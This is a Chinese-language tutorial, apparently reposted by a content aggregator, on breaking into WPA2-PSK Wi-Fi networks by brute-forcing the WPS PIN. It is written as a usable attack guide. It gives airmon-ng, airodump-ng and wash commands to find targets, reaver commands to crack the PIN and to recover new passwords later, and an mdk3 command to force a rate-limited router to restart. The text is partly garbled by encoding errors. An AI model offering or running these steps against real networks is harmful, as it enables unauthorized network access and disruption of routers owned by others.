【前言】

? ? 現(xiàn)在的路由器大多都默認用 WPA2-PSK 方式對無線網(wǎng)絡進行加密了，不能再像 WEP 加密方式那樣好破解，使用字典又需要費心費力地整理字典，而且字典破解的效率還慢。所以我們需要更有效率的破解方法。好在現(xiàn)在大多數(shù)的路由器都提供 WPS 功能，通過這個功能，用戶可以使用 PIN 碼登錄到路由器。但這個 PIN 碼的長度只有 8 位，而且可能的取值只有11000種（注意，不是 10^8 種）。所以我們可以進行簡單粗暴的窮舉 PIN 碼破解，而且我們可以推斷出這種破解方法在目標 AP 開啟了 WPS 功能的情況下是可以百分之百破解它的。這其實是很老的破解手段了，但至今依然奏效。

?

【操作步驟】

1、切換無線網(wǎng)卡到監(jiān)聽模式：
? ? airmon-ng ?start ?wlan0

2、刺探附近 WLAN 網(wǎng)絡（這個命令所跟的參數(shù)值可以在 步驟1 完成后從提示信息中查看到）：
? ? airodump-ng ?wlan0mon

??

3、找出開啟了 WPS 功能、可以使用 PIN碼 登錄的路由器，并另外記錄下該 AP 的 BSSID（約等于該 AP 的 MAC 地址）：
? ? wash ?-i ?wlan0mon

??

3、開始進行 PIN碼 窮舉破解（注意末尾的參數(shù)是 2 個小寫字母 v）：
? ? reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv

參數(shù)說明：
-i ?無線網(wǎng)卡名稱
-b ?目標AP的mac地址
-a ?自動檢測目標AP最佳配置
-S ?使用最小的DH key，可以提高破解速度
-vv ?顯示更多的非嚴重警告（注意這是 2 個小寫字母 v）
-d ?即delay每窮舉一次的閑置時間 預設為1秒
-c ?信道編號
-p ?PIN碼四位或八位 ?//可以用8位直接找到密碼。

??

?

4、等待破解完成（這個破解可能會時間比較長，和你的目標 AP 有關，我當時花費了 12 個小時才破解出來），這期間我們可以查看到窮舉破解花費的時間、預計剩余時間、窮舉PIN碼進度 信息：

??

破解完成后，查看并記錄下 PIN碼 和 密碼：

??

?

5、獲取到 PIN碼 后，以后即便路由器更換了密碼，我們也可以很迅速地通過 PIN碼 重新獲得新密碼。以上方獲取到的信息舉例：

? ? reaver ?-i ?wlan0mon -b ?xx:xx:xx:xx:xx:xx ?-p 12316977

?

【注意事項】

? ? 1、如果在執(zhí)行 reaver 命令后看到有 WARNING: Failed to associate with xx:xx:xx:xx:xx:xx 這樣的提示信息，那么應該是你選擇了一個不具備或關閉了 WPS 功能的路由器。這種情況下就執(zhí)行wash 命令并重新選擇一個路由器吧。

? ? 2、如果在執(zhí)行 reaver 命令后看到有?warning detected ap rate limiting waiting 60 seconds before re-checking 這樣的提示信息，這表示目標路由器開啟了防 PIN破解 功能。因為我們是窮舉 PIN碼 進行破解的，當連續(xù)使用超過某個次數(shù)的 PIN碼 后，路由器會暫時鎖定 WPS 功能一段時間。這種情況下要么我們耐心等待其恢復 WPS 功能，要么執(zhí)行?mdk3 wlan0mon a -a xx:xx:xx:xx:xx:xx?（這是上面的目標AP的MAC地址）命令讓路由器主動重啟或被動重啟以恢復 WPS 功能。

?

?

總結(jié)

以上是生活随笔為你收集整理的使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。